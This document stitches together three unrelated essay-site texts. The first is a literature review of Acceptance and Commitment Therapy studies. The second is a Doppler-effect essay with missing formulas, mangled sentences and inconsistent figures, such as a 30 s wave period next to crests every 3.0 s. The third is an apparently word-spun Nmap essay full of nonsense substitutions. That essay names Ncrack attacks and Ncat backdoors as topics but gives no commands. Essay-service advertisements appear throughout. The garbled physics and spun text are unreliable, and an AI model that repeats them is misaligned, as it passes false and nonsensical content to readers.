The paper involved describing and evaluating a protocol for Acceptance and Commitment Therapy (ACT) for children and adolescents with a diagnosis of anxiety disorder. The aim is to determine the effectiveness of a manualized ACT group-therapy programme in the treatment of anxiety disorders in the population of youth. Additionally the authors aim to identify which mechanisms of change regarding the ACT intervention are crucial to changes in outcome measures for the adolescent participants. The randomised controlled trial will involve the randomisation of patients to ACT, Cognitive Behavior Therapy (CBT) or a waitlist control. Participants in the ACT or CBT groups will receive 10 one and a half hour group-therapy sessions each week, whilst participants in the control group will receive CBT after 10 weeks. Repeated measured are to be taken immediately after the completion of therapy and three months post therapy. The authors scope of the study is to add to the paucity of research regarding the efficacy of ACT in youth with anxiety. Limitations are not definite with the trial not yet being completed, however, there is suggestion that difficulties may arise concerning recruitment and retention of participants, particularly adolescents. The authors conclude that to date this will not only be the largest trial of ACT in the treatment of youth, but will also be the first randomised controlled trial which examines the effectiveness of ACT in youth with a diagnosis of anxiety disorder. This study will be of value by adding to the current research and literature and also has the potential to provide extensive data on the effectiveness of ACT for anxiety disorders and the mechanisms involved in the process of change. Furthermore, this study may provide methods for parents to help their children and give useful information when selecting treatments in contemporary clinical practice.

Swain, J., Hancock, K., Hainsworth, C., & Bowman, J. (2013). Acceptance and Commitment Therapy in the treatment of anxiety: A systematic review. Clinical Psychology Review, 33(8), 965-978. doi: 10.1016/j.cpr.2013.07.002

Swain, Hancock, Hainsworth and Bowman (2013) conducted a broad systematic review to examine the effectiveness of  Acceptance and Commitment Therapy (ACT) in the treatment of anxiety. Databases, such as PsychoInfo, PsychArticles, and Medline, were utilised for published data up to October 2012. Proquest database was used to identify unpublished literature, such as dissertations and theses. Furthermore, reference lists were analysed and citation searches conducted. The study aimed to evaluate the empirical research for ACT in the treatment of anxiety, including both published and unpublished literature, and to assess the utility of ACT in the treatment of anxiety. Data was extracted from studies that met the inclusion criteria which involved ACT intervention studies which applied a minimum of two of ACT’s core processes; studies specifically aimed at treating anxiety disorder, problem anxiety or anxiety symptoms; outcome measures arranged to determine reduction of anxiety symptoms or remission and of established psychometric quality; and articles prepared in English. A method of quality assessment termed Psychotherapy Outcome Study Methodology Rating Form (POMRF) was utilised to review the articles which examines 22 individual methodological elements. The scope of the study involves applying ACT specifically to anxiety disorders and treating anxious symptoms. The study focuses on outcomes that include reductions in clinician-rated and self-report anxiety measures and investigating whether the diagnostic criteria is achieved for a given anxiety disorder. Results are tentative due to the limited number and quality of eligible studies. Due to the relationship between effect sizes and POMRF scores being unknown, no analysis of this relationship was able to be conducted. The POMRF assessment of methodological rigour identified that the majority of studies demonstrated various fundamental design errors, such as no control comparison. Most disorders were examined by only a small number of studies and used various outcome assessment tools therefore making comparisons challenging. Additionally, it was difficult to compare the effectiveness of ACT to other psychological treatments due to studies being often underpowered to identify the differences, or between-group analyses not being stated. Furthermore, typical in this domain of research, problems were found in the variety of therapeutic terminology used, diversity in treatment modalities, and some studies being found to be statistically insignificant. The review, which used a broad inclusion criteria and literature to maximise findings and reduce publication bias, provides preliminary evidence for ACT in the treatment of anxiety in clinical and nonclinical populations. Furthermore, ACT demonstrated statistically significant results in individual and group configurations. This review has been advantageous in adding to the current literature by providing preliminary support for the utility of ACT as an alternative intervention in the treatment of anxiety. However, additional research is required to examine the effectiveness of ACT in relation to specific anxiety disorders and underrepresented populations, such as youth and the elderly.

Pahnke, J., Lundgren, T., Hursti, T., & Hirvikoski, T. (2014). Outcomes of an Acceptance and Commitment Therapy-based skills training group for students with high-functioning autism spectrum disorder: A quasi-experimental pilot study. Autism, 18(8), 953-964. doi: 10.1177/1362361313501091

Using a quasi-experimental design, this study investigated the feasibility and outcomes of a 6-week Acceptance and Commitment Therapy (ACT) training programme for a group of young adults with high-functioning autism. The study aimed to evaluate whether an ACT model, which has been modified in ways that make it feasible to use with individuals with autism spectrum disorder (ASD), reduces stress and emotional distress, and increases psychological flexibility in individuals with ASD. The intervention endeavoured to use acceptance and mindfulness skills, and behaviour change procedures to support individuals with ASD deal with difficult emotions, cognitions and body sensations. Additionally, the intervention aimed to break experiential avoidance patterns, and assist in identifying valuable life directions and then act accordingly. Furthermore, it was proposed that the intervention would support individuals with ASD to acquire skills that would aid them to cope with uncomfortable mental events and sensory inputs and use goal-directed behaviours. The study recruited participants that had been diagnosed with ASD within a special school environment to increase the ecological validity of the intervention. The intervention measured participant characteristics and the outcome of the intervention were measured by the Stress Survey Schedule, the Strengths and Difficulties Questionnaires (SDQ), and the Beck Youth Inventories (BYI). The Stress Survey Schedule and the SDQ were teacher- and self-rated, whereas the BYI was only self-rated. Using the 6-week ACT training programme, the study focused on decreasing levels of stress, hyperactivity, emotional distress and increasing prosocial behaviour, and psychological flexibility. The main limitations identified were the small sample size and low statistical power, which consequently limited the analyses of potential effects of background factors, such as gender, IQ, age, and co-morbidity, on the treatment results. The ACT programme resulted in a decrease of reported student and teacher stress and increases in self-reported prosocial behaviour. Thus, it was concluded that the ACT training programme has the potential to be an effective treatment which is feasible in a special school environment and has the capability to be useful in reducing stress and psychiatric symptoms in young adults with ASD. The results of this research are crucial in the development and implementation of ACT-based treatment programmes for young individuals with ASD. To test the validity of the intervention larger studies and replications of the programme would be beneficial and in various environments.

Halliburton, A., & Cooper, L. (2015). Applications and adaptations of Acceptance and Commitment therapy (ACT) for adolescents. Journal of Contextual Behavioral Science, 4(1), 1-11. doi: 10.1016/j.jcbs.2015.01.002

Livheim, F., Hayes, L., Ghaderi, A., Magnusdottir, T., Hogfeldt, A., Rowse, J., … Tengstrom, A. (2015). The effectiveness of Acceptance and Commitment Therapy for adolescent mental health: Swedish and Australian pilot outcomes. Journal of Child and Family Studies, 24(4), 1016-1030. doi: 10.1007/s10826-014-9912-9

Wicksell, R., Kanstrup, M., Kemani, M., Holmstrom, L., & Olsson, G. (2015). Acceptance and Commitment Therapy for children and adolescents with physical health concerns. Current Opinion in Psychology, 2, 1-5. doi: 10.1016/j.copsyc.2014.12.029

The article provides an overview of the research conducted on Acceptance and Commitment Therapy (ACT) for youth whom have physical concerns such as pain, acquired brain injuries, cystic fibrosis, and sickle cell disease.The authors aimed to identify whether ACT is effective at improving or retaining functioning in youth with physical concerns, and if this is maintained in the presence of longstanding symptoms and associated distress. Papers for this review were either from an ongoing systematic review in regards to ACT and pain, or through complementary searches in PubMed and PsychInfo. Measures of outcome and process variables of children included Chronic Pain Acceptance Questionnaire (CPAWQ) and the psychological Inflexibility in Pain Scale. Measures to assess parental processes included the Parent Psychological Flexibility Questionnaire (PPFQ) and the adapted parent version of CPAQ. The paper focuses on the treatment effects of ACT in developing guidelines to match specific interventions to individuals, maximising their effectiveness. The main limitation was the minimal studies that have been conducted regarding ACT in youth with physical concerns. Additionally, majority of the studies conducted involved individuals suffering from chronic undefined pain and the methodological quality largely varied. Thus no conclusions could be drawn concerning how ACT works and for whom.In conclusion, ACT appears to be promising in the treatment of youths with physical concerns and ACT-oriented interventions may enhance the effects of medical interventions. However, it is emphasised that more research is required to evaluate ACT. This paper is valuable in determining the utility of an ACT approach in the treatment of a specific population and therefore provides beneficial supplementary information for the research of ACT.

Swain, J., Hancock, K., Dixon, A., & Bowman, J. (2015). Acceptance and Commitment Therapy for children: A systematic review of intervention studies. Journal of Contextual Behavioral Science, 4(2), 73-85. doi:10.1016/j.jcbs.2015.02.001

A systematic review was completed by Swain, Hancock, Dixon and Bowman (2015) examining published and unpublished research regarding Acceptance and Commitment Therapy (ACT) interventions for children. With the increasing number of available studies, the aim of this systematic review was to examine the evidence for ACT in the treatment of children and produce support for future evidence-based clinical decision-making in this domain. Furthermore, the authors intended to deliver an integrated synthesis of the literature by including an analysis of the findings and an evaluation of the methodological accuracy of included studies. The authors utilised an extensive inclusion criteria in order to maximise review breadth. Quality assessment was administered using the 22-item “Psychotherapy outcome study methodology rating form” (POMRF), which has been recognised as a critical step in progressing the field (Gaudiano, 2009). POMRF measures methodological items such as research design and therapist training, and assigns each study an overall score between 0 and 44 with higher scores demonstrating greater methodological rigour. The prevalence of research focused on quality of life outcomes, symptoms, and psychological flexibility on measures reported by parents, clinicians and patients. The research also concerned the maintenance of the treatment gains at a follow-up assessment after the commencement of the treatment. The authors acknowledge that limitations of the intervention studies may include author bias, which cannot be ruled out due to the majority of the studies being administered by a group of affiliated researchers. This is also associated with therapist allegiance and experience and skill, which both inadvertently may result in study outcomes being distorted by preferences towards a treatment or theory, and treatment gains related to the experience of the therapist (Luborsky, Singer, & Luborsky, 1975). Another limitation is the lack of measurement in quality of life (QOL) outcomes, which has been suggested to reflect the clinical significance of changes and effectiveness of ACT. The review concludes that the emerging evidence indicates ACT is effective in the treatment of children across an extensive range of issues. However, the authors emphasise the need of larger scale methodological trials from an extensive research group, research on various age groups, and ACT treatment delivered through group or family-based formats to further strengthen these findings. This review provides evidence that for clinicians ACT may be regarded as a feasible therapeutic option when working with children. Furthermore,  it is proposed that ACT may be used with individuals with intellectual disabilities, such as autism.

Leoni, M., Corti, S., Cavagnola, R., Healy, O., & Noone, S. (2016). How Acceptance and Commitment Therapy changed the perspective on support provision for staff working with intellectual disability. Advances in Mental Health and Intellectual Disabilities, 10(1), 59-73. doi: 10.1108/AMHID-09-2015-0046

The authors acknowledge that a career in mental health can be emotionally and psychologically demanding increasing the risk of burnouts and psychological distress, however, it is acknowledged that such a profession can also be rewarding and satisfying. The article examines the effects of interventions for professionals working with individuals with intellectual disabilities, with a particular focus on the efficacy of Acceptance and Commitment Therapy (ACT) training. The paper aims to develop and facilitate an improved understanding of distressing processes, and methods to implement positive resources to promote well-being. Appropriate theoretical models and literature associated with stress reduction were examined from a Cognitive Behaviour Therapy (CBT) approach with a specific focus on ACT. The paper focused on the wellbeing and behaviour of professionals whom support individuals with intellectual disabilities, in addition to ACT and various third wave generation behavioural approaches. The paper acknowledges limitations including when staff behaviour becomes controlled by cognitions, thus it is difficult to develop a reliable measure to access these thoughts and the level of fusion. Additionally, small sample sizes in the interventions and a need to increase replication studies to investigate the impact of ACT on specific intellectual disability settings (i.e. gender, age, type and frequency of therapy) are noted. Furthermore, it is acknowledged that it may be challenging to state exactly whether changes in stress levels are a result of exclusively ACT or a combination of ACT and ABA training, as ACT training contains elements of ABA (Bethay, Wilson, Schnetzer, & Nassar, 2013). The research provides evidence that ACT-based interventions appear promising in improving the well-being of professionals working with intellectual disabilities in addition to reducing the risk of burnout and increasing psychological flexibility. Brief ACT workshops were also confirmed to be efficient in reducing occupational stress and increase feelings of efficacy.This research is of value as it provides evidence that the implementation of ACT interventions can be effective and beneficial for both staff and the individuals with intellectual disabilities that they support.

Villatte, JL., Vilardaga, R., Villatte, M., Vilardaga, JC., Atkins, DC., & Hayes, SC. (2016). Acceptance and Commitment Therapy modules: Differential impact on treatment processes and outcomes. Behaviour Research and Therapy, 77, 52-61. doi: 10.1016/j.brat.2015.12.001

The authors emphasise the impact of selecting and implementing components of Acceptance and Commitment Therapy (ACT), a promising candidate for modularization. ACT open consists primarily of procedures focusing on the acceptance and cognitive defusion processes of the psychological flexibility model, which aim to decrease the occurrence of detrimental responses to cognitions, sensations and feelings. ACT engaged consists of procedures which identify the values and action processes of the psychological flexibility model and intends to increase motivation and meaningful behaviour. The study aims to investigate the functional relationships between ACT intervention components, processes, and results which consequently will aid in the development of a modular, transdiagnostic treatment specifically for the adult population. 15 adults who met the inclusion criteria, which involved meeting clinical case status on the Brief symptom Inventory and being aged 18 years or over, were included in the study. 7 participants were allocated to ACT open and 8 participants allocated to ACT engaged. The results of the treatment measures were based on the severity of psychological symptoms and the quality of life. The study focused on evaluating the specific effects of each ACT component (ACT open and ACT engaged) on the treatment process and outcomes when employed in clinical service settings. A limitation identified included the small sample size (N=15), which indicates that the study should be replicated in a larger sample across various therapists, treatment settings, and participants. Both ACT open and ACT engaged established broad symptom improvements; increases in quality of life; high treatment acceptability and completion rates; and satisfaction from participants. Treatment effects were also maintained at a 3-month follow up. Therefore, it is suggested that ACT components could be included in a modular method to completing evidence-based psychosocial interventions for the adult population. The results of the study are of value at a clinical and community level as they highlight the differences of implementation in both components of the ACT intervention and show the effectiveness of the ACT process with adults seeking mental health treatment.

Ong, C., Lee, E., & Twohig, M. (2018). A meta-analysis of dropout rates in acceptance and commitment therapy. Behaviour Research and Therapy, 104, 14-33. doi: 10.1016/j.brat.2018.02.004

The article looks at the overall acceptability of Acceptance and Commitment Therapy (ACT) and how it measures to that of other empirically supported treatments. The authors administered a meta-analysis to investigate the rate of individuals that drop out of ACT interventions. The aims of the study involved examining dropout rates in ACT across a wide variety of psychological and behavioural issues, comparing dropout rates in ACT to those in other psychological interventions, and determining moderators, such as client characteristics and therapy variables, of dropout in ACT. For studies to be included in the meta-analysis, which was conducted following the PRISMA guidelines, they had to meet a specific criteria including: random assignment to treatment condition; inclusion of at least one comparison condition; participants having a psychological diagnosis, behavioural issue, or physical diagnosis; therapy being conducted face-to-face; in line with the ACT protocol; and be published in English. The authors used the Psychotherapy Outcome Study Methodology Rating Scale to analyse results from 68 studies. The review focused on the dropout rate, which is a crucial aspect of treatment utility, of clients who participate in ACT. As the meta-analysis solely focused on randomized controlled trials, the generalizability of the results to other settings was consequently limited. Due to insufficient data the authors acknowledge that analyses regarding moderating variables, that may be associated to dropout, were unable to be conducted. Additionally, dropout rates based on overall attrition were only investigated as a result of the limited data and may be higher than reported. The studies involved did not use the same scales to analyse the data which complicates the analysis of results. In addition to comparable effectiveness of ACT to other treatment, ACT demonstrates comparable dropout rates. Higher-level clinicians/therapists were associated with increased dropout rates in addition to “therapist experience” being identified as a factor that can significantly influence dropout rates. This study reveals that there is no significant differences in dropout rates in regard to ACT and other interventions, therefore ACT has the ability to be effective for a range of psychological and behavioural health concerns. However, it should be acknowledged that studies which resulted in high dropout rates may not have been published and therefore results of this meta-analysis may be skewed.

Our academic experts are ready and waiting to assist with any writing project you may have. From simple essay plans, through to full dissertations, you can guarantee we have a service perfectly matched to your needs.
View our services

Acceptance and Commitment Therapy (ACT) is a newer psychotherapy that has produced plenty of clinical and research interest and increased in popularity in recent years. After investigating research regarding the behaviourally based and broadly applicable model, it can be concluded that ACT is successful in treating a vast variety of psychological problems, such as depression and anxiety, psychopathology, and physical health concerns. Additionally, although ACT was originally developed in the domain of clinical psychology, ACT has demonstrated potential in aiding individuals’ health behaviour change. A dominant finding in the reviewed articles was that interventions based on ACT have demonstrated significant improvements in differing populations in regard to the levels of depression and psychological flexibility. The core principles and processes of ACT have been identified as being applicable in individuals who do not have psychological or physical impairments themselves but are tending to individuals with a range of issues, such as physical concerns and intellectual disabilities. ACT has been found to mitigate psychological distress and reduce levels of depression in these caregivers. Furthermore, there is an abundance of research which have demonstrated that ACT is a feasible and effective treatment option in many populations even when compared to other empirically supported and established therapies such as cognitive-behavioral therapy (CBT). It was acknowledge that evidence does not exist for ACT to be used above CBT, however, both treatments were found equally effective in treating anxiety in the population of children.

The articles reviewed did not provide any contradictory research results.

The results of the review suggests that the ACT model can have a positive impact and cause significant improvements on individuals when applied by trained professionals. This can be associated to long-term implications involving client satisfaction and precision in client-therapist communication. It is also to be acknowledged that the review found clinical expertise to be associated with improved outcomes of ACT. Furthermore, the research indicated that due to the focus that ACT has regarding acceptance, self, and emotions the model is attractive to many nonbehaviorual and skilled clinicians, suggesting that the limited number of concepts of ACT can still have a board clinical appeal (Strosahl, Hayes, Bergan, & Romano, 1998). Some of the outcomes identified went beyond alterations in symptoms to outcomes of major systems importance, such as the interest from government and care organisations regarding the brief time period which has an evident impact on cost effectiveness in health care delivery systems. Another implication was that the sample sizes for previous studies has been small and populations diverse, thus conclusions need to be taken with caution. In one particular study the participants resided in the identical school area which limited the generalizability of the results. Most of the studies, which seem to support many critical aspects of ACT, represent smaller pilot studies with methodological limitations.

Although research involving randomized clinical trials and controlled time series investigating ACT is growing, for ACT to continue to advance in the future and to clarify the efficacy of its research some issues need to be addressed (Strosahl et al., 1998). Most studies of ACT thus far have been conducted with the adult population, therefore the results of its effectiveness when applied to adolescents and children is restricted. It would be valuable for ACT to be applied in a diverse population in order to investigate its promising trans-diagnostic and robust effects. Furthermore, increasing efforts are required to replicate previous findings utilising independent and larger samples, this is important when examining the robustness of the preliminary effects previously reported. Additional research involving controlled experimental studies which examine processes crucial in ACT, such as self and values, will aid to supplement and further support the results from larger efficacy trials (Gaudiano, 2011). It has been proposed that traditional symptom measures may be unsuccessful in identifying hypothesised ACT-specific change processes and influence null results. Future research in regard to developing more reliable and valid measures for processes and outcomes in ACT is recommended. Additionally, including more objective, behavioural task-based measure will aid self-reported measures.

The articles reviewed demonstrated that ACT interventions were successful in treating individuals with physical health concerns and autism spectrum disorder (ASD) in addition to individuals that aided in their care. It has been proposed that 33% of adults with an ASD diagnosis additionally have a physical disability, however, there is limited research on ACT in the comorbidity of physical health concerns and ASD (Rydezewska et al., 2018). Due to the high comorbidity it would be of benefit for future research into an effective intervention to treat this population.

References

Bethay, S., Wilson, KG., Schnetzer, L., & Nassar, S. (2013). A controlled pilot evaluation of Acceptance and Commitment Training for intellectual disability staff. Mindfulness, 4(2), 113-121. doi: 10.1007/s12671-012-0103-8

Blackledge, J., & Hayes, S. (2006). Using Acceptance and Commitment Training in the Support of Parents of Children diagnosed with Autism. Child and Family Behavior Therapy, 28(1), 1-18. doi: 10.1300/J019v28n01_01

Breslau, N., & Davis, GC. (1986). Chronic stress and major depression. Archives of General Psychiatry, 43(4), 309-314. doi: 10.1001/archpsyc.1986.01800040015003

Calear, AL., & Christensen, H. (2010). Systematic review of school-based prevention and early intervention programs for depression. Journal of Adolescence, 33(3), 429-438. doi: 10.1016/j.adoles cence.2009.07.004

Gaudiano, BA. (2009). Ost’s (2008) methodological comparison of clinical trials of acceptance and commitment therapy versus cognitive behavior therapy: Matching apples with oranges? Behaviour Research and Therapy, 47(12), 1066-1070. doi: 10.1016/j.brat.2009.07.020

Gaudiano, B. (2011). A review of Acceptance and Commitment Therapy (ACT) and recommendations for continued scientific advancement. The Scientific Review of Mental Health Practice, 8(2), 2-22.

Halliburton, A., & Cooper, L. (2015). Applications and adaptations of Acceptance and Commitment therapy (ACT) for adolescents. Journal of Contextual Behavioral Science, 4(1), 1-11. doi: 10.1016/j.jcbs.2015.01.002

Leoni, M., Corti, S., Cavagnola, R., Healy, O., & Noone, S. (2016). How Acceptance and Commitment Therapy changed the perspective on support provision for staff working with intellectual disability. Advances in Mental Health and Intellectual Disabilities, 10(1), 59-73. doi: 10.1108/AMHID-09-2015-0046

Livheim, F., Hayes, L., Ghaderi, A., Magnusdottir, T., Hogfeldt, A., Rowse, J., … Tengstrom, A. (2015). The effectiveness of Acceptance and Commitment Therapy for adolescent mental health: Swedish and Australian pilot outcomes. Journal of Child and Family Studies, 24(4), 1016-1030. doi: 10.1007/s10826-014-9912-9

Luborsky, L., Singer, B., & Luborsky, L. (1975). Comparative studies of psychotherapies. Is it true that “everywon has one and all must have prizes”? Archives of General Psychiatry, 32(8), 995-1008. doi:10.1001/archpsyc.1975.01760260059004

Murrell, A., & Scherbarth, A. (2011). State of the research & literature address: ACT with children, adolescents and parents. The International Journal of Behavioral Consultation and Therapy, 7(1), 15-22. doi: 10.1037/h0101005

Ong, C., Lee, E., & Twohig, M. (2018). A meta-analysis of dropout rates in acceptance and commitment therapy. Behaviour Research and Therapy, 104, 14-33. doi: 10.1016/j.brat.2018.02.004

Pahnke, J., Lundgren, T., Hursti, T., & Hirvikoski, T. (2014). Outcomes of an Acceptance and Commitment Therapy-based skills training group for students with high-functioning autism spectrum disorder: A quasi-experimental pilot study. Autism, 18(8), 953-964. doi: 10.1177/1362361313501091

Rydzewska, E., Hughes-McCormack, LA., Gillberg, C., Henderson, A., MacIntyre, C., Rintoul J., & Cooper, SA. (2018). Prevalence of long-term health conditions in adults with autism: observational study of a whole country population. BMJ Open, 8(8), 1-11. doi: 10.1136/ bmjopen-2018-023945

Strosahl, K., Hayes, S., Bergan, J., & Romano, P. (1998). Assessing the field effectiveness of Acceptance and Commitment Therapy: An example of the manipulated training research method. Behavior Therapy, 29(1), 35-64. doi: 10.1016/S0005-7894(98)80017-8

Swain, J., Hancock, K., Dixon, A., Koo, S., & Bowan, J. (2013). Acceptance and Commitment Therapy for anxious children and adolescents: Study protocol for a randomised controlled trial. Trials, 14(140),  1-12. doi:  10.1186/1745-6215-14-140.

Swain, J., Hancock, K., Dixon, A., & Bowman, J. (2015). Acceptance and Commitment Therapy for children: A systematic review of intervention studies. Journal of Contextual Behavioral Science, 4(2), 73-85. doi: 10.1016/j.jcbs.2015.02.001

Swain, J., Hancock, K., Hainsworth, C., & Bowman, J. (2013). Acceptance and Commitment Therapy in the treatment of anxiety: A systematic review. Clinical Psychology Review, 33(8), 965-978. doi: 10.1016/j.cpr.2013.07.002

Villatte, JL., Vilardaga, R., Villatte, M., Vilardaga, JC., Atkins, DC., & Hayes, SC. (2016). Acceptance and Commitment Therapy modules: Differential impact on treatment processes and outcomes. Behaviour Research and Therapy, 77, 52-61. doi: 10.1016/j.brat.2015.12.001

Wicksell, R., Kanstrup, M., Kemani, M., Holmstrom, L., & Olsson, G. (2015). Acceptance and Commitment Therapy for children and adolescents with physical health concerns. Current Opinion in Psychology, 2, 1-5. doi: 10.1016/j.copsyc.2014.12.029

## The Doppler Effect And Its Applications

Perhaps you have noticed how the sound of a vehicle’s horn changes as the vehicle moves past you. The frequency of the sound you hear as the vehicle approaches you is higher than the frequency you hear as it moves away from us. This is one example of the Doppler Effect. To see what causes this apparent frequency change, imagine you are in a boat that is lying at anchor on a gentle sea where the waves have a period of T =30s. This means that every 3.0 s a crest hits your boat. These effects occur because the relative speed between your boat and the waves depends on the direction of travel and on the speed of your boat. When you are moving toward the right in Figure 17.9b, this relative speed is higher than that of the wave speed, which leads to the observation of an increased frequency. When you turn around and move to the left, the relative speed is lower, as is the observed frequency of the water waves.
Content
Doppler Effect (Sound) and its Application
Introduction
In physics, the Doppler Effect can be defined as, “The increase or decrease in the frequency of sound and also to other waves such as the source and observer moving toward or away from each other. Thus the effect causes the change in pitch which is clearly noticed in a passing siren or train horn, as well as in the red shift/blue shift.

If you need assistance with writing your essay, our professional essay writing service is here to help!
Essay Writing Service

The Doppler Effect is familiar to us with everyday experiences. It explains us the change in the pitch of a fast moving car horn or any other fast moving sound source as it passes us. If the car is approaching us, the pitch of the car’s horn will be greater than if the car were stationary and as the car passes us and begins to move away from us the pitch will be lower than if the car were stationary. In fact, whenever the source and observer of a sound are in relative motion, the observed frequency will be different than that of the emitted one by the source.
For example:
The Observer feel higher frequency, when the train is coming to the observer.
The Observer feel lower frequency, when the train is going far from the observer.
History:
The Doppler Effect was discovered by a scientist named Christian Doppler, who gifted his idea to us in year1842. He thought, “if sound wave coming from the source might have a greater frequency and if the source is moving toward or the observer so there will be lower frequency if the source is moving away from the observer. Though some doubted the existence of this phenomenon, it was experimentally verified in 1845 by C. H. D. Buys Ballot (1817-1890) of Holland. Buys Ballot examined the alteration in pitch as he was passed by a locomotive carrying several trumpeters, all playing a constant note. The Doppler effect is considered most often in relation to sound (acoustic waves) and light (electromagnetic waves) but holds for any wave. When the source and observer of light waves move apart, the observed light will be shifted to lower frequencies, towards the “red” end of the spectrum, while if the source and observer move toward each other the light will be shifted to higher frequencies, towards the “blue” end of the spectrum.
The Doppler Effect is the phenomenon to observe at a particular time when the wave is emitted by a source moving w.r.t. the observer .The Doppler Effect can be stated as the effect produced by a moving source of wave when there is an apparent upward shift in the frequency to be observed by the observer and the source which is approaching toward it and the downward shift in the frequency to which it when the observer and the source is contacting.
Change in the wavelength due to the motion of the source
For the waves which propagate in the medium, such as sound waves, the speed of the observer and the source are in relation with the medium to which the waves are transmitted. The Doppler Effect may result from the change in position of the source, relative motion to the observer. Each of the effect is analyzed singly. For the waves which do not require any medium for propagation, eg. Light and gravity in general relativity, for it the difference in velocity of the observer and that of the source needs to be considered.
HOW DOPPLER EFFECT DOES OCCURS:
TYPES OF DOPPLER EFFECT:
Symmetrical: – It implies that Doppler shift is same when the source of light moves towards/away from a stationary observer or the observer moves with the same velocity towards/away from the stationary source.
Asymmetrical: – It implies that apparent change in the frequency is different when the source of sound moves towards/away from a stationary observer or as that occurs, when the observer moves with the same velocity towards/away from the stationary source.
DOPPLER FORMULAE:
Now the observer is in motion and also the source is stationary, then the measured frequency is:
(1)
When the up sign correspond to the arriving observer and the lower sign correspond to a receding observer.
Now the source is in motion and the observer is stationary, then the measured frequency is:
, (2)
Where the up sign correspond to the source arriving and the lower sign correspons to the source receding from the observer.
When both the source and observer are in motion, then the measured frequency is:
3)
Note that the sign in the numerator and denominator are not depending on each other. By using the general facts for the sign at the numerator, the up sign is to be used if the observer is moving toward the source and the down sign if moving away from the source; in the denominator, the upper sign is used if the source is in motion w.r.t the source towards the observer and the lower sign if moving away.
A simple trick to remember the signs is to remind one when or not the observed frequency is becoming to increase or decrease and to use whenever sign is required. For eg, when an observer is moving away from a source, the wave are going to move across it at the slow rate rather than if it was still, which signifies that the observers frequency is decreasing.
And also it can be for when the source is in motion w.r.t an observer, it will go to “smoosh” the wave together as it emit it, which means to say that the increase in the observed frequency. This will be covered by making the denominator in eq (3) smaller, which do requires using it again.
Source moving with V source In picture shows sound source has radiated sound wave at the const. frequency in the same medium. However, the sound source is turning to the right with a speed Vs = 0.7 V(In mach). The wave fronts are to be produced with the same frequency. Since the source is moving and the center of the new wave front is now slightly shifted to the right. As a result, the wave fronts start bunching on the right side (in front of) and spread further on the left side of source. An observer in the front of the sourceis made to hear it at higher frequency f Â´ > f0, and then the observer back to the source will hear a lower frequency f Â´ Source moving with V source = V sound:
Here the source is moving with the speed of sound in the medium (Vs = V, Mach 1). The wave fronts in front of the source are all bunched up to the same point. An observer in front of the source will feel nothing until the source arrives to him. The front will be quite intense, due to all the wave fronts add together.The figure at right shows a bullet travelling at Mach 1.01. You can see the shock wave front just ahead of the bullet.
Source moving with V source > V sound:
The sound source has been broken through the sound speed barrier, and is traveling at the greater speed then the speed of sound. Here the source is moving faster than that of the sound waves it creates are really leading the advancing wave fronts. It is this intense pressure front on the Mach cone that causes the shock wave known as a sonic boom as a supersonic aircraft passes overhead. The shock wave advances at the speed of sound v, since it has been built up from all of the combined wave fronts, the sound heard to the observer will be of the quite intense.
Application of Doppler Effect:
Sirens: – “The reason why the siren slides or blow, is because it doesn’t hit you.”
It can be says as, if the siren is approaching to the observer directly, the pitch of the sound would remain constant (we have, vs, r is the radial component) till the source hit the observer, and then jump to the lower pitch. Because of the vehicle passes from the observer, the radial velocity never remains constant, but instead to vary as a function of the angle between observer line of sight and the siren’s velocity:
Vr = Vscos Î¸
Where vs is the velocity of the source w.r.t. the medium, and the angle Î¸ is the angle between the object’s forward velocity and the line of sight from the object to the observer.
Radar:-In the radars Doppler Effect is widely used in some of the radar, to measure the velocity of the object. A sound with required wavelength, intensity is fired to a moving target as it approaches from the radar source. Each subsequent radar wave has to travel farther to reach the object, before being redetected near the source. As each wave has to move farther, the gap between each wave increases, increasing the wavelength. Calculations from the Doppler Effect accurately determine the observer’s velocity.
Weather Analysis or prediction: -Doppler radar uses the Doppler Effect for electromagnetic waves to predict the weather.
In Astronomy:-The Doppler shift for light is used to help astronomers discover new planets and binary stars.
Echocardiography: – A medical test uses ultrasound and Doppler techniques to visualize the structure of the heart.

## NMAP Scan: Features and Applications

NMAP Scan

Introduction:

Before we tend to start with the technical intricacies of mastering Nmap, it is a sensible

idea to know however Nmap itself began and evolved as a project. This tool has

been around for nearly twenty years, and could be a well-loved and often-used element

across several technical industries.

Nmap started from humble beginnings. in contrast to the industrial security tools that are discharged these days, the terribly 1st Nmap was solely concerning two,000 lines of code and was discharged in 1997 in issue fifty-one of Phrack, a hacker “zine” that was started in 1985. Nmap s timeline is a fascinating one, and its growth has been extraordinary.

Features of Nmap:

Although port scanning is clearly vital for security professionals—after all while not understanding what network ports are open, it’d be not possible to assess the protection of a system. Nmap is additionally terribly valuable for different styles of information technology professionals.

System directors use Nmap to work out that of their systems are on-line, so they will perceive if there are issues or inconsistencies on their network. Likewise, victimisation OS detection and repair detection, these directors are ready to easily verify that each one system are running the identical (hopefully current) versions of operating systems and network-enabled software package.

Because of its ability to alter temporal order, in addition as set specific flags on completely different packets (for example, the feast day Tree scan), developers will communicate Nmap for facilitate in testing embedded network stacks, so as to verify that the aggressive network traffic will not have accidental outcomes that will crash a system.

Lastly and maybe most importantly students of network and pc engineering are major users of Nmap. as a result of it’s a free and open supply software package, there is no barrier to induce the software package and run it in real time. Even amateur users scanning their own little home networks will learn Associate in Nursing Brobdingnagian quantity concerning however their computers and networks work and are designed by seeing what services are online though there are Windows and OS X ports, Nmap is additionally a good introduction to running easy (but advanced) tools on the UNIX system program line.

Techniques used by Nmap:

In Gregorian calendar month 2006, one among the foremost vital aspects of the Nmap project was integrated into all Nmap builds: Nmap Scripting Engine (NSE). The NSE allows users of Nmap to put in writing their own modules (in a artificial language called Lua) to trigger on sure ports being open, or sure services—or even specific versions of services—found listening. This unharness permits the elevation of Nmap from an easy networking tool to a totally strong and customizable vulnerability assessment engine, appropriate for a good type of tasks.

In addition to making a robust scanning tool and also the NSE, Nmap developers have included many further tools—including Ncrack, Nping, Ncat, and Ndiff—into default install bundles of Nmap. These tools will facilitate analyze existing scans, pivot to other hosts, transfer files, or compare scan results over time.

In this chapter, we are going to cowl the subsequent topics:

assaultive services with Ncrack

Host detection with Nping

File transfers and backdoors with Ncat

scrutiny Nmap results with Ndiff

Experimental setup and usage of Nmap:

File transfers and backdoors with Ncat

